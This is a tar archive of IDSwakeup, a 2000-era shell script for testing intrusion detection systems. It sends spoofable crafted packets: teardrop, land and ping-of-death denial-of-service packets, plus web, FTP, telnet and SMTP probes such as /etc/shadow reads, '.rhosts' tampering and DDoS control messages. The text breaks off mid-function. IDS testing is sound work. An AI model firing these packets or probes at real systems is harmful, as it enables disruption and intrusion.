IDSwakeup-1.0/0040755000175000001440000000000007171561434012423 5ustar aubertusersIDSwakeup-1.0/IDSwakeup0100755000175000001440000006110607171561434014206 0ustar aubertusers#!/bin/sh # IDSwakeup # Stephane Aubert # Hervé Schauer Consultants (c) 2000 # see LICENSE file ### Usage & Banner ####### trap End 2 3 6 10 12 15 19 #color from vetescan if [ $color -eq 1 ] ; then blink=""; cl=""; mag=""; cyn=""; red=""; hblk=""; hmag=""; hcyn="" hwht=""; hred=""; bblk=""; bred="" bmag=""; bcyn=""; bwht=""; bg="" wht="" fi Banner () { clear echo $red echo "-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-" echo "- IDSwakeup : false positive generator -" echo "- Stephane Aubert -" echo "- Hervé Schauer Consultants (c) 2000 -" echo "-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-" echo $cl } Usage () { echo " ${cyn}Usage : $0 [nb] [ttl]${cl}" echo exit } End () { echo echo "${red}-=- Bye ! - sa/hsc -=-${cl}" echo exit } ### Define ############## IWU='./iwu' ## Patch hping2 in hping2.h ## change : #define COUNTREACHED_TIMEOUT 10 ## by : #define COUNTREACHED_TIMEOUT 1 HPING='./hping2' verbose=2 ### Vars ################# nb=1 ttl=1 src='127.0.0.1' dst='127.0.0.1' unp=6666 ### Args ################# Banner if [ $# -lt 2 ] ; then Usage else src=$1 dst=$2 fi if [ "$src" = "0" ] ; then spoofsrc=1 else spoofsrc=0 fi if [ $# -ge 3 ] ; then nb=$3 fi if [ $# -ge 4 ] ; then ttl=$4 fi echo " ${hblk}src_addr:$src dst_addr:$dst nb:$nb ttl:$ttl ${cl}" echo ### Script ############### IDSwakeup () { send teardrop send land send get_phf send bind_version send get_phf_syn_ack_get send ping_of_death send syndrop send newtear send X11 send SMBnegprot send smtp_expn_root send finger_redirect send ftp_cwd_root send ftp_port send trin00_pong send back_orifice send msadcs send www_frag send www_bestof # send www_all send ddos_bestof send ftp_bestof send telnet_bestof send rlogin_bestof send tcpflag_bestof send icmp_bestof send smtp_bestof send misc_bestof send dos_chargen send dos_snork send dos_syslog } ### Howto write sig ###### ### use tcpdumpx from Wietse Venema # IP_HDR vhl/tos len/len id/id off/off ttl/pro sum/sum src/src src/src # IP_HDR dst/dst dst/dst # IP_OPT .... # # UDP_HDR src/src dst/dst len/len sum/sum # # TCP_HDR src/src dst/dst seq/seq seq/seq ack/ack ack/ack # TCP_HDR off/flg win/win sum/sum urp/urp # # ICMP_HDR code/type ### Functions ############ seed=`expr $$ % 255` rand=0 random () { mult=25173; inc=13849; mod=65536 number=`expr \( $seed \* $mult + $inc \) % $mod` seed=$number rand=`expr $number % 200 + 50` } gensrc () { if [ $spoofsrc -eq 1 ] ; then random; a=$rand random; b=$rand random; c=$rand random; d=$rand src="${a}.${b}.${c}.${d}" fi } genunp () { random unp=`expr $rand + 1531` ## why not ? } send () { if [ $# -eq 1 ] ; then echo " ${hblk}sending :${cl} ${mag}$1${cl} ${hblk}...${cl}" $1 else echo "run needs an arg !" fi } trace () { proto=$1 paylod=$2 if [ $verbose -gt 1 ] ; then buf="$src -> $dst" else buf='' fi if [ $verbose -gt 0 ] ; then echo " ${hblk}$buf $proto$cl ${cyn}$payload${cl}" fi } udpsend () { sport=$1 dport=$2 payload=$3 count=`/bin/echo -n "$payload"|wc -c` gensrc trace "${dport}/udp" "$payload" $HPING -q --udp -a $src $dst -s $sport -k -p $dport -i u100 -t $ttl -c $nb --sign "$payload" -d $count 1>/dev/null 2>/dev/null } tcpsend () { port=$1 payload=$2 count=`/bin/echo -n "$payload"|wc -c` gensrc trace "${port}/tcp" "$payload" $HPING -q -a $src $dst -PA -p $port -i u100 -t $ttl -c $nb --sign "$payload" -d $count 1>/dev/null 2>/dev/null } tcpsendflag () { sport=$1 dport=$2 flags=$3 payload=$4 count=`/bin/echo -n "$payload"|wc -c` gensrc trace "${dport}/tcp $flags" "$payload" $HPING -q -a $src $dst $flags -s $sport -k -p $dport -i u100 -t $ttl -c $nb --sign "$payload" -d $count 1>/dev/null 2>/dev/null } tcpfragsend () { port=$1 payload=$2 count=`/bin/echo -n "$payload"|wc -c` gensrc trace "${port}/fragmented-tcp" "$payload" $HPING -q -a $src $dst -PA --mtu 16 -p $port -i u100 -t $ttl -c $nb --sign "$payload" -d $count 1>/dev/null 2>/dev/null } icmpsend () { type=$1 code=$2 payload=$3 count=`/bin/echo -n "$payload"|wc -c` gensrc trace "icmp type:$type code:$code" "$payload" $HPING -q --icmp -C $type -K $code -a $src $dst -i u100 -t $ttl -c $nb --sign "$payload" -d $count 1>/dev/null 2>/dev/null } #-- Using hping ---------- msadcs () { tcpsend 80 'GET /msadc/msadcs.dll HTTP/1.0 ' } www_frag () { tcpfragsend 80 'GET /................................... HTTP/1.0' tcpfragsend 80 'GET /AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\ AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\ AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\ AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../cgi-bin/phf HTTP/1.0' } www_bestof () { tcpsend 80 'GET / HTTP/1.0' tcpsend 80 'GET //////// HTTP/1.0' tcpsend 80 'HEAD / HTTP/1.0' tcpsend 80 'HEAD/./' tcpsend 80 '/cgi-bin\\handler' tcpsend 80 '/cgi-bin\\webdist.cgi' tcpsend 80 '/mlog.phtml' tcpsend 80 '/mylog.phtml' tcpsend 80 '/cfide\\administrator\\startstop.html' tcpsend 80 '/cfappman\\index.cfm' tcpsend 80 '/mall_log_files\\order.log' tcpsend 80 '/admin_files\\order.log' tcpsend 80 '/cgi-bin\\wrap' tcpsend 80 'GET /cgi-bin/ph%66 HTTP/1.0' tcpsend 80 'GET /sahsc.lnk HTTP/1.0' tcpsend 80 'GET /sahsc.bat HTTP/1.0' tcpsend 80 'GET /sahsc.url HTTP/1.0' tcpsend 80 'GET /sahsc.ida HTTP/1.0' tcpsend 80 'GET /default.asp::$DATA HTTP/1.0' tcpsend 80 'GET / HTTP/1.0' tcpsend 80 'PUT /scripts/cmd.exe HTTP/1.0' tcpsend 80 'GET /scripts/cmd.exe HTTP/1.0' tcpsend 80 'BAD /scripts/cmd.exe HTTP/1.0' tcpsend 80 'GET /_vti_pvt/administrators.pwd HTTP/1.0' tcpsend 80 'GET /cgi-bin/handler HTTP/1.0' tcpsend 80 'GET /../../../../../../etc/passwd HTTP/1.0' tcpsend 80 'GET /cgi-bin/perl.exe HTTP/1.0' tcpsend 80 'GET /scripts/tools/newdsn.exe HTTP/1.0' tcpsend 80 'GET /search97.vts HTTP/1.0' tcpsend 80 'GET /IISADMIN HTTP/1.0' } www_all () { tcpsend 80 'GET / HTTP/1.0' tcpsend 80 'GET ../.. HTTP/1.0' tcpsend 80 'GET ../../boot.ini HTTP/1.0' tcpsend 80 'GET /......../ HTTP/1.0' tcpsend 80 'GET /....../autoexec.bat HTTP/1.0' tcpsend 80 'GET /.cshrc HTTP/1.0' tcpsend 80 'GET /.profile HTTP/1.0' tcpsend 80 'GET /.html/............../config.sys HTTP/1.0' tcpsend 80 'GET /?PageServices HTTP/1.0' tcpsend 80 'GET /PDG_Cart/order.log HTTP/1.0' tcpsend 80 'GET /PDG_Cart/shopper.conf HTTP/1.0' tcpsend 80 'GET /WebShop/logs/cc.txt HTTP/1.0' tcpsend 80 'GET /WebShop/templates/cc.txt HTTP/1.0' tcpsend 80 'GET /_vti_bin/shtml.dll HTTP/1.0' tcpsend 80 'GET /_vti_bin/shtml.exe HTTP/1.0' tcpsend 80 'GET /_vti_inf.html HTTP/1.0' tcpsend 80 'GET /_vti_pvt/admin.pwd HTTP/1.0' tcpsend 80 'GET /_vti_pvt/administrators.pwd HTTP/1.0' tcpsend 80 'GET /_vti_pvt/authors.pwd HTTP/1.0' tcpsend 80 'GET /_vti_pvt/service.pwd HTTP/1.0' tcpsend 80 'GET /_vti_pvt/users.pwd HTTP/1.0' tcpsend 80 'GET /_vti_pwd/administrators.pwd HTTP/1.0' tcpsend 80 'GET /adsamples/config/site.csc HTTP/1.0' tcpsend 80 'GET /aux HTTP/1.0' tcpsend 80 'GET /carbo.dll HTTP/1.0' tcpsend 80 'GET /cfappman/index.cfm HTTP/1.0' tcpsend 80 'GET /cfdocs/cfmlsyntaxcheck.cfm HTTP/1.0' tcpsend 80 'GET /cfdocs/expelval/displayopenedfile.cfm HTTP/1.0' tcpsend 80 'GET /cfdocs/expelval/exprcalc.cfm HTTP/1.0' tcpsend 80 'GET /cfdocs/expelval/openfile.cfm HTTP/1.0' tcpsend 80 'GET /cfdocs/expelval/sendmail.cfm HTTP/1.0' tcpsend 80 'GET /cfdocs/expelvel/openfile.cfm HTTP/1.0' tcpsend 80 'GET /cfdocs/snippets/fileexist.cfm HTTP/1.0' tcpsend 80 'GET /cgi-bin/ HTTP/1.0' tcpsend 80 'GET /cgi-bin/AT-admin.cgi HTTP/1.0' tcpsend 80 'GET /cgi-bin/AnyBoard.cgi HTTP/1.0' tcpsend 80 'GET /cgi-bin/AnyForm2 HTTP/1.0' tcpsend 80 'GET /cgi-bin/Count.cgi HTTP/1.0' tcpsend 80 'GET /cgi-bin/FormHandler.cgi HTTP/1.0' tcpsend 80 'GET /cgi-bin/LWGate HTTP/1.0' tcpsend 80 'GET /cgi-bin/LWGate.cgi HTTP/1.0' tcpsend 80 'GET /cgi-bin/MachineInfo HTTP/1.0' tcpsend 80 'GET /cgi-bin/add_ftp.cgi HTTP/1.0' tcpsend 80 'GET /cgi-bin/aglimpse HTTP/1.0' tcpsend 80 'GET /cgi-bin/alibaba.pl HTTP/1.0' tcpsend 80 'GET /cgi-bin/archie HTTP/1.0' tcpsend 80 'GET /cgi-bin/architext_query.cgi HTTP/1.0' tcpsend 80 'GET /cgi-bin/ax-admin.cgi HTTP/1.0' tcpsend 80 'GET /cgi-bin/ax.cgi HTTP/1.0' tcpsend 80 'GET /cgi-bin/axs.cgi HTTP/1.0' tcpsend 80 'GET /cgi-bin/bigconf.cgi HTTP/1.0' tcpsend 80 'GET /cgi-bin/bnbform.cgi HTTP/1.0' tcpsend 80 'GET /cgi-bin/cachemgr.cgi HTTP/1.0' tcpsend 80 'GET /cgi-bin/campas HTTP/1.0' tcpsend 80 'GET /cgi-bin/cgitest.exe HTTP/1.0' tcpsend 80 'GET /cgi-bin/cgiwrap HTTP/1.0' tcpsend 80 'GET /cgi-bin/classified.cgi HTTP/1.0' tcpsend 80 'GET /cgi-bin/classifieds.cgi HTTP/1.0' tcpsend 80 'GET /cgi-bin/day5datacopier.cgi HTTP/1.0' tcpsend 80 'GET /cgi-bin/dbmlparser.exe HTTP/1.0' tcpsend 80 'GET /cgi-bin/download.cgi HTTP/1.0' tcpsend 80 'GET /cgi-bin/dumpenv.pl HTTP/1.0' tcpsend 80 'GET /cgi-bin/edit.pl HTTP/1.0' tcpsend 80 'GET /cgi-bin/environ.cgi HTTP/1.0' tcpsend 80 'GET /cgi-bin/faxsurvey HTTP/1.0' tcpsend 80 'GET /cgi-bin/filemail.cgi HTTP/1.0' tcpsend 80 'GET /cgi-bin/filemail.pl HTTP/1.0' tcpsend 80 'GET /cgi-bin/files.pl HTTP/1.0' tcpsend 80 'GET /cgi-bin/finger HTTP/1.0' tcpsend 80 'GET /cgi-bin/flexform.cgi HTTP/1.0' tcpsend 80 'GET /cgi-bin/gH.cgi HTTP/1.0' tcpsend 80 'GET /cgi-bin/get32.exe HTTP/1.0' tcpsend 80 'GET /cgi-bin/glimpse HTTP/1.0' tcpsend 80 'GET /cgi-bin/guestbook.cgi HTTP/1.0' tcpsend 80 'GET /cgi-bin/guestbook.pl HTTP/1.0' tcpsend 80 'GET /cgi-bin/handler HTTP/1.0' tcpsend 80 'GET /cgi-bin/htmlscript HTTP/1.0' tcpsend 80 'GET /cgi-bin/icat HTTP/1.0' tcpsend 80 'GET /cgi-bin/imagemap.exe HTTP/1.0' tcpsend 80 'GET /cgi-bin/info2www HTTP/1.0' tcpsend 80 'GET /cgi-bin/jj HTTP/1.0' tcpsend 80 'GET /cgi-bin/lwgate HTTP/1.0' tcpsend 80 'GET /cgi-bin/lwgate.cgi HTTP/1.0' tcpsend 80 'GET /cgi-bin/maillist.cgi HTTP/1.0' tcpsend 80 'GET /cgi-bin/maillist.pl HTTP/1.0' tcpsend 80 'GET /cgi-bin/man.sh HTTP/1.0' tcpsend 80 'GET /cgi-bin/meta.pl HTTP/1.0' tcpsend 80 'GET /cgi-bin/mlog.phtml HTTP/1.0' tcpsend 80 'GET /cgi-bin/nlog-smb.cgi HTTP/1.0' tcpsend 80 'GET /cgi-bin/nph-error.pl HTTP/1.0' tcpsend 80 'GET /cgi-bin/nph-publish HTTP/1.0' tcpsend 80 'GET /cgi-bin/nph-test-cgi HTTP/1.0' tcpsend 80 'GET /cgi-bin/passwd HTTP/1.0' tcpsend 80 'GET /cgi-bin/passwd.txt HTTP/1.0' tcpsend 80 'GET /cgi-bin/password HTTP/1.0' tcpsend 80 'GET /cgi-bin/password.txt HTTP/1.0' tcpsend 80 'GET /cgi-bin/perl HTTP/1.0' tcpsend 80 'GET /cgi-bin/perl.exe HTTP/1.0' tcpsend 80 'GET /cgi-bin/perlshop.cgi HTTP/1.0' tcpsend 80 'GET /cgi-bin/pfdisplay HTTP/1.0' tcpsend 80 'GET /cgi-bin/pfdisplay.cgi HTTP/1.0' tcpsend 80 'GET /cgi-bin/phf HTTP/1.0' tcpsend 80 'GET /cgi-bin/php HTTP/1.0' tcpsend 80 'GET /cgi-bin/php.cgi HTTP/1.0' tcpsend 80 'GET /cgi-bin/post_query HTTP/1.0' tcpsend 80 'GET /cgi-bin/ppdscgi.exe HTTP/1.0' tcpsend 80 'GET /cgi-bin/query HTTP/1.0' tcpsend 80 'GET /cgi-bin/responder.cgi HTTP/1.0' tcpsend 80 'GET /cgi-bin/rguest.exe HTTP/1.0' tcpsend 80 'GET /cgi-bin/rpm_query HTTP/1.0' tcpsend 80 'GET /cgi-bin/search.cgi HTTP/1.0' tcpsend 80 'GET /cgi-bin/survey.cgi HTTP/1.0' tcpsend 80 'GET /cgi-bin/test-cgi HTTP/1.0' tcpsend 80 'GET /cgi-bin/test-cgi.tcl HTTP/1.0' tcpsend 80 'GET /cgi-bin/textcounter.pl HTTP/1.0' tcpsend 80 'GET /cgi-bin/tst.bat HTTP/1.0' tcpsend 80 'GET /cgi-bin/unlg1.1 HTTP/1.0' tcpsend 80 'GET /cgi-bin/unlg1.2 HTTP/1.0' tcpsend 80 'GET /cgi-bin/upload.pl HTTP/1.0' tcpsend 80 'GET /cgi-bin/view-source HTTP/1.0' tcpsend 80 'GET /cgi-bin/w3-msql/ HTTP/1.0' tcpsend 80 'GET /cgi-bin/webbbs.cgi HTTP/1.0' tcpsend 80 'GET /cgi-bin/webdist.cgi HTTP/1.0' tcpsend 80 'GET /cgi-bin/webgais HTTP/1.0' tcpsend 80 'GET /cgi-bin/webmap.cgi HTTP/1.0' tcpsend 80 'GET /cgi-bin/websendmail HTTP/1.0' tcpsend 80 'GET /cgi-bin/wguest.exe HTTP/1.0' tcpsend 80 'GET /cgi-bin/whois_raw.cgi HTTP/1.0' tcpsend 80 'GET /cgi-bin/www-sql HTTP/1.0' tcpsend 80 'GET /cgi-bin/wwwboard.cgi HTTP/1.0' tcpsend 80 'GET /cgi-bin/wwwboard.pl HTTP/1.0' tcpsend 80 'GET /cgi-dos/args.bat HTTP/1.0' tcpsend 80 'GET /cgi-shl/win-c-sample.exe HTTP/1.0' tcpsend 80 'GET /cgi-win/uploader.exe HTTP/1.0' tcpsend 80 'GET /com1 HTTP/1.0' tcpsend 80 'GET /com2 HTTP/1.0' tcpsend 80 'GET /com3 HTTP/1.0' tcpsend 80 'GET /con HTTP/1.0' tcpsend 80 'GET /default.asp. HTTP/1.0' tcpsend 80 'GET /default.asp::$DATA HTTP/1.0' tcpsend 80 'GET /domcfg.nsf/?open HTTP/1.0' tcpsend 80 'GET /iisadmpwd/achg.htr HTTP/1.0' tcpsend 80 'GET /iisadmpwd/aexp2.htr HTTP/1.0' tcpsend 80 'GET /iissamples/exair/howitworks/codebrws.asp HTTP/1.0' tcpsend 80 'GET /iissamples/exair/search/advsearch.asp HTTP/1.0' tcpsend 80 'GET /iissamples/iissamples/query.asp HTTP/1.0' tcpsend 80 'GET /iissamples/sdk/asp/docs/codebrws.asp HTTP/1.0' tcpsend 80 'GET /lpt HTTP/1.0' tcpsend 80 'GET /msadc/msadcs.dll HTTP/1.0' tcpsend 80 'GET /msads/Samples/SELECTOR/showcode.asp HTTP/1.0' tcpsend 80 'GET /photoads/ HTTP/1.0' tcpsend 80 'GET /photoads/cgi-bin/ HTTP/1.0' tcpsend 80 'GET /photoads/cgi-bin/env.cgi HTTP/1.0' tcpsend 80 'GET /publisher/ HTTP/1.0' tcpsend 80 'GET /pw/storemgr.pw HTTP/1.0' tcpsend 80 'GET /quikstore.cfg HTTP/1.0' tcpsend 80 'GET /samples/search/queryhit.htm HTTP/1.0' tcpsend 80 'GET /sahsc.ida HTTP/1.0' tcpsend 80 'GET /sahsc.idq HTTP/1.0' tcpsend 80 'GET /sahsc.asp%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20.htr HTTP/1.0' tcpsend 80 'GET /scripts/../../cmd.exe?%2FC+echo+"hello">c:\hello.bat HTTP/1.0' tcpsend 80 'GET /scripts/CGImail.exe HTTP/1.0' tcpsend 80 'GET /scripts/convert.bas HTTP/1.0' tcpsend 80 'GET /scripts/counter.exe HTTP/1.0' tcpsend 80 'GET /scripts/cpshost.dll HTTP/1.0' tcpsend 80 'GET /scripts/fpcount.exe HTTP/1.0' tcpsend 80 'GET /scripts/iisadmin/bdir.htr HTTP/1.0' tcpsend 80 'GET /scripts/issadmin/bdir.htr HTTP/1.0' tcpsend 80 'GET /scripts/perl.exe HTTP/1.0' tcpsend 80 'GET /scripts/proxy/w3proxy.dll HTTP/1.0' tcpsend 80 'GET /scripts/pu3.pl HTTP/1.0' tcpsend 80 'GET /scripts/samples/search/webhits.exe HTTP/1.0' tcpsend 80 'GET /scripts/tools/getdrvs.exe HTTP/1.0' tcpsend 80 'GET /scripts/tools/newdsn.exe HTTP/1.0' tcpsend 80 'GET /scripts/visadmin.exe HTTP/1.0' tcpsend 80 'GET /search HTTP/1.0' tcpsend 80 'GET /search97.vts HTTP/1.0' tcpsend 80 'GET /session/admnlogin HTTP/1.0' tcpsend 80 'GET /ssi/envout.bat HTTP/1.0' tcpsend 80 'GET /status HTTP/1.0' } smtp_bestof () { tcpsend 25 'rcpt to: bouncebounce' tcpsend 25 'expn root' tcpsend 25 'expn decode' tcpsend 25 'debug' tcpsend 25 'vrfy smtp' tcpsend 25 'mail from: |' tcpsend 25 'rcpt to: |' } ftp_bestof () { tcpsend 21 'PORT 127,0,0,1,0,23' tcpsend 21 'PORT 10,6,6,6,0,23' tcpsend 21 'PORT 127,0,0,1,255,510' tcpsend 21 'passwd' tcpsend 21 'site exec %p%p%p%p%p%p' tcpsend 21 'SITE exec cat /etc/passwd ;-)' tcpsend 21 'SYST /etc/passwd ;-)' tcpsend 21 'SYST' tcpsend 21 'CWD ~root' tcpsend 21 'STOR |' tcpsend 21 'RETR |' } telnet_bestof () { tcpsend 23 'ciscociscociscociscociscociscociscociscociscociscocisco' tcpsend 23 ' bof' tcpsend 23 'IFS=/' tcpsend 23 'su - root' tcpsend 23 'su root' tcpsend 23 'id; cat /etc/shadow' tcpsend 23 'echo "+ +">.rhosts' tcpsend 23 'resolv_host_conf' tcpsend 23 'ld_preload' tcpsend 23 'ld_library_pat' } rlogin_bestof () { tcpsend 513 'IFS=/' tcpsend 513 'su - root' tcpsend 513 'su root' tcpsend 513 'id; cat /etc/shadow' tcpsend 513 'echo "+ +">.rhosts' } dos_chargen () { udpsend 7 19 'hello' } dos_snork () { udpsend 135 135 'hi !...' } dos_syslog () { genunp udpsend $unp 514 'B0MB' } tcpflag_bestof () { genunp; tcpsendflag $unp 80 '-SF' '' genunp; tcpsendflag $unp 80 '-SR' '' genunp; tcpsendflag $unp 80 '' '' genunp; tcpsendflag $unp 80 '-A' '' genunp; tcpsendflag $unp 80 '-SFR' '' genunp; tcpsendflag $unp 80 '-SFARPXY' '' genunp; tcpsendflag $unp 80 '-SA' '' genunp; tcpsendflag $unp 80 '-SAFR' '' genunp; tcpsendflag $unp 80 '-XY' '' #cisco ident genunp; tcpsendflag $unp 1999 '-S' '' } icmp_bestof () { icmpsend 0 0 '' icmpsend 0 0 'Hi B0B !...' icmpsend 3 0 '' icmpsend 3 1 '' icmpsend 3 2 '' icmpsend 3 3 '' icmpsend 3 4 '' icmpsend 3 5 '' icmpsend 3 13 '' icmpsend 3 14 '' icmpsend 3 15 '' icmpsend 4 0 '' icmpsend 5 0 '' icmpsend 5 1 '' icmpsend 5 2 '' icmpsend 5 3 '' icmpsend 8 0 '' icmpsend 11 0 '' icmpsend 11 1 '' icmpsend 12 0 '' icmpsend 13 0 '' icmpsend 14 0 '' icmpsend 15 0 '' icmpsend 16 0 '' icmpsend 17 0 '' icmpsend 18 0 '' } misc_bestof () { # src_addr = 127.0.0.1 $HPING -q -a 127.0.0.1 $dst -S -p 25 -i u100 -t $ttl -c $nb 1>/dev/null 2>/dev/null # IP options-Record Packet Route $HPING -q -a $src $dst -G -S -p 25 -i u100 -t $ttl -c $nb 1>/dev/null 2>/dev/null #bad tcp checksum $HPING -q -a $src $dst -b -S -p 111 -i u100 -t $ttl -c $nb 1>/dev/null 2>/dev/null #SNMP genunp; udpsend $unp 161 'public' genunp; udpsend $unp 161 'private' genunp; udpsend $unp 161 'all private' genunp; udpsend $unp 162 'trap trap trap ...' #pcanywhere tcpsend 5631 'ADMINISTRATOR' # rpc high port genunp tcpsendflag $unp 32771 '-S' '' # Napster tcpsend 6699 '.mp3' tcpsend 8888 '.mp3' tcpsend 7777 '.mp3' tcpsend 6666 '.mp3' tcpsend 5555 '.mp3' tcpsend 4444 '.mp3' tcpsend 8875 'anon@napster.com' } ddos_bestof () { # mstream : client to handler genunp tcpsendflag $unp 15104 '-S' '' # mstream : handler to client genunp tcpsendflag 12754 $unp '-PA' '>' # mstream : client to handler genunp tcpsendflag $unp 12754 '-PA' '>' # mstream : agent pong to handler genunp; udpsend $unp 10498 'pong' # mstream : handler ping to agent genunp; udpsend $unp 10498 'ping' # mstream : handler to agent genunp; udpsend $unp 10498 'stream/' # mstream : agent to handler genunp; udpsend $unp 6838 'newserver' # Trin00 tcpsend 27665 'killme' genunp; udpsend $unp 31335 'PONG' genunp; udpsend 31335 $unp 'l44' genunp; udpsend 31335 $unp '*HELLO*' tcpsend 27665 'gOrave' # shaft tcpsend 20432 '' genunp; udpsend $unp 18753 'alive tijgu' genunp; udpsend $unp 20433 'alive' genunp tcpsendflag 23 $unp '-S --setseq 674711609' '' } #-- Using tcpdump -------- teardrop () { $IWU $src $dst $nb $ttl "\ 4500 0038 00f2 2000 4011 53be 0101 0101 \ 0202 0202 e63e 4494 0024 0000 0000 0000 \ 0000 0000 0000 0000 0000 0000 0000 0000 \ 0000 0000 0000 0000" $IWU $src $dst $nb $ttl "\ 4500 0018 00f2 0003 4011 73db 0101 0101 \ 0202 0202 e63e 4494" } land () { #careful : src = dst $IWU $dst $dst $nb $ttl "\ 4500 0028 0f1c 0000 ff06 a4ac 0202 0202 \ 0202 0202 0035 0035 0000 0f1c 0000 0000 \ 5002 0800 9055 0000" } get_phf () { $IWU $src $dst $nb $ttl "\ 4500 004f 231f 4000 4006 c254 0101 0101 \ 0202 0202 0669 0050 640e 6204 73d4 effa \ 8018 7d78 9659 0000 0101 080a 00ef 609d \ 0b64 df29 4745 5420 2f63 6769 2d62 696e \ 2f70 6866 2048 5454 502f 312e 300a 0a" } bind_version () { $IWU $src $dst $nb $ttl "\ 4500 003a 233a 0000 4011 0244 0101 0101 \ 0202 0202 04e1 0035 0026 82ab 0006 0100 \ 0001 0000 0000 0000 0776 6572 7369 6f6e \ 0462 696e 6400 0010 0003" } get_phf_syn_ack_get () { $IWU $src $dst $nb $ttl "\ 4500 003c 22af 4000 4006 c2d7 0101 0101 \ 0202 0202 0662 0050 ed75 49e4 0000 0000 \ a002 7d78 b73e 0000 0204 05b4 0402 080a \ 00ec 7f22 0000 0000 0103 0300" $IWU $src $dst $nb $ttl "\ 4500 0034 22b0 4000 4006 c2de 0101 0101 \ 0202 0202 0662 0050 ed75 49e5 fce2 41ce \ 8010 7d78 9e35 0000 0101 080a 00ec 7f22 \ 0b61 fdab" $IWU $src $dst $nb $ttl "\ 4500 004f 22ff 4000 4006 c274 0101 0101 \ 0202 0202 0667 0050 54a6 4c48 65f5 9f89 \ 8018 7d78 cdaf 0000 0101 080a 00ef 06b0 \ 0b64 8537 4745 5420 2f63 6769 2d62 696e \ 2f70 6866 2048 5454 502f 312e 300a 0a" } ping_of_death () { $IWU $src $dst $nb $ttl "\ 4500 0190 10e1 3e3e ff01 1618 0101 0101 \ 0202 0202 0000 0000 0000 0000 0000 0000 \ 0000 0000 0000 0000 0000 0000 0000 0000 \ 0000 0000 0000 0000 0000 0000 0000 0000 \ 0000 0000 0000 0000 0000 0000 0000 0000 \ 0000 0000 0000 0000 0000 0000 0000 0000 \ 0000 0000 0000 0000 0000 0000 0000 0000 \ 0000 0000 0000 0000 0000 0000 0000 0000 \ 0000 0000 0000 0000 0000 0000 0000 0000 \ 0000 0000 0000 0000 0000 0000 0000 0000 \ 0000 0000 0000 0000 0000 0000 0000 0000 \ 0000 0000 0000 0000 0000 0000 0000 0000 \ 0000 0000 0000 0000 0000 0000 0000 0000 \ 0000 0000 0000 0000 0000 0000 0000 0000 \ 0000 0000 0000 0000 0000 0000 0000 0000 \ 0000 0000 0000 0000 0000 0000 0000 0000 \ 0000 0000 0000 0000 0000 0000 0000 0000 \ 0000 0000 0000 0000 0000 0000 0000 0000 \ 0000 0000 0000 0000 0000 0000 0000 0000 \ 0000 0000 0000 0000 0000 0000 0000 0000 \ 0000 0000 0000 0000 0000 0000 0000 0000 \ 0000 0000 0000 0000 0000 0000 0000 0000 \ 0000 0000 0000 0000 0000 0000 0000 0000 \ 0000 0000 0000 0000 0000 0000 0000 0000 \ 0000 0000 0000 0000 0000 0000 0000 0000" } syndrop () { $IWU $src $dst $nb $ttl "\ 4500 003c 00f2 2000 4006 0491 0101 0101 \ 0202 0202 c305 9fe7 0000 0000 0000 0000 \ 0030 0200 0000 0000 0000 0000 0000 0000 \ 0000 0000 110d 0000 ffff ffff" } newtear () { $IWU $src $dst $nb $ttl "\ 4500 0030 00f2 2000 4011 0492 0101 0101 \ 0202 0202 74f0 5cdf 0030 0000 0000 0000 \ 0000 0000 0000 0000 0000 0000 0000 0000" $IWU $src $dst $nb $ttl "\ 4500 0018 00f2 0003 4011 24a7 0101 0101 \ 0202 0202 74f0 5cdf" } X11 () { $IWU $src $dst $nb $ttl "\ 4500 003c 24b5 4000 4006 c0d1 0101 0101 \ 0202 0202 068d 1770 ec25 e2d3 0000 0000 \ a002 7d78 e066 0000 0204 05b4 0402 080a \ 00f2 a709 0000 0000 0103 0300" } SMBnegprot () { $IWU $src $dst $nb $ttl "\ 4500 00dc 24ec 4000 4006 bffa 0101 0101 \ 0202 0202 0692 008b f592 21fa 0527 1ee4 \ 8018 7d78 0b18 0000 0101 080a 00f2 e6be \ 0b68 6559 0000 00a4 ff53 4d42 7200 0000 \ 0008 0100 0000 0000 0000 0000 0000 0000 \ 0000 9e2c 0000 0100 0081 0002 5043 204e \ 4554 574f 524b 2050 524f 4752 414d 2031 \ 2e30 0002 4d49 4352 4f53 4f46 5420 4e45 \ 5457 4f52 4b53 2031 2e30 3300 024d 4943 \ 524f 534f 4654 204e 4554 574f 524b 5320 \ 332e 3000 024c 414e 4d41 4e31 2e30 0002 \ 4c4d 312e 3258 3030 3200 0253 616d 6261 \ 0002 4e54 204c 414e 4d41 4e20 312e 3000 \ 024e 5420 4c4d 2030 2e31 3200" } smtp_expn_root () { $IWU $src $dst $nb $ttl "\ 4510 003f 251c 4000 4006 c057 0101 0101 \ 0202 0202 0694 0019 072a b42b 173b 5366 \ 8018 7d78 99e5 0000 0101 080a 00f3 b907 \ 0b69 3439 6578 706e 2072 6f6f 740d 0a" } finger_redirect () { $IWU $src $dst $nb $ttl "\ 4500 003c 2528 4000 4006 c05e 0101 0101 \ 0202 0202 0698 004f 2864 0003 0000 0000 \ a002 7d78 242e 0000 0204 05b4 0402 080a \ 00f4 20e9 0000 0000 0103 0300" } ftp_cwd_root () { $IWU $src $dst $nb $ttl "\ 4510 0034 2555 4000 4006 c029 0101 0101 \ 0202 0202 069b 0015 2fd3 52d3 3f89 ef14 \ 8010 7d78 af2e 0000 0101 080a 00f4 58f8 \ 0b69 d796" } ftp_port () { $IWU $src $dst $nb $ttl "\ 4510 003f 2556 4000 4006 c01d 0101 0101 \ 0202 0202 069b 0015 2fd3 52d3 3f89 ef14 \ 8018 7d78 7771 0000 0101 080a 00f4 5d1b \ 0b69 d796 6377 6420 7e72 6f6f 740d 0a" } trin00_pong () { $IWU $src $dst $nb $ttl "\ 4500 0021 2678 0000 4011 ff1e 0101 0101 \ 0202 0202 04e1 7a67 000d 82bf 504f 4e47 \ 0a" } back_orifice () { $IWU $src $dst $nb $ttl 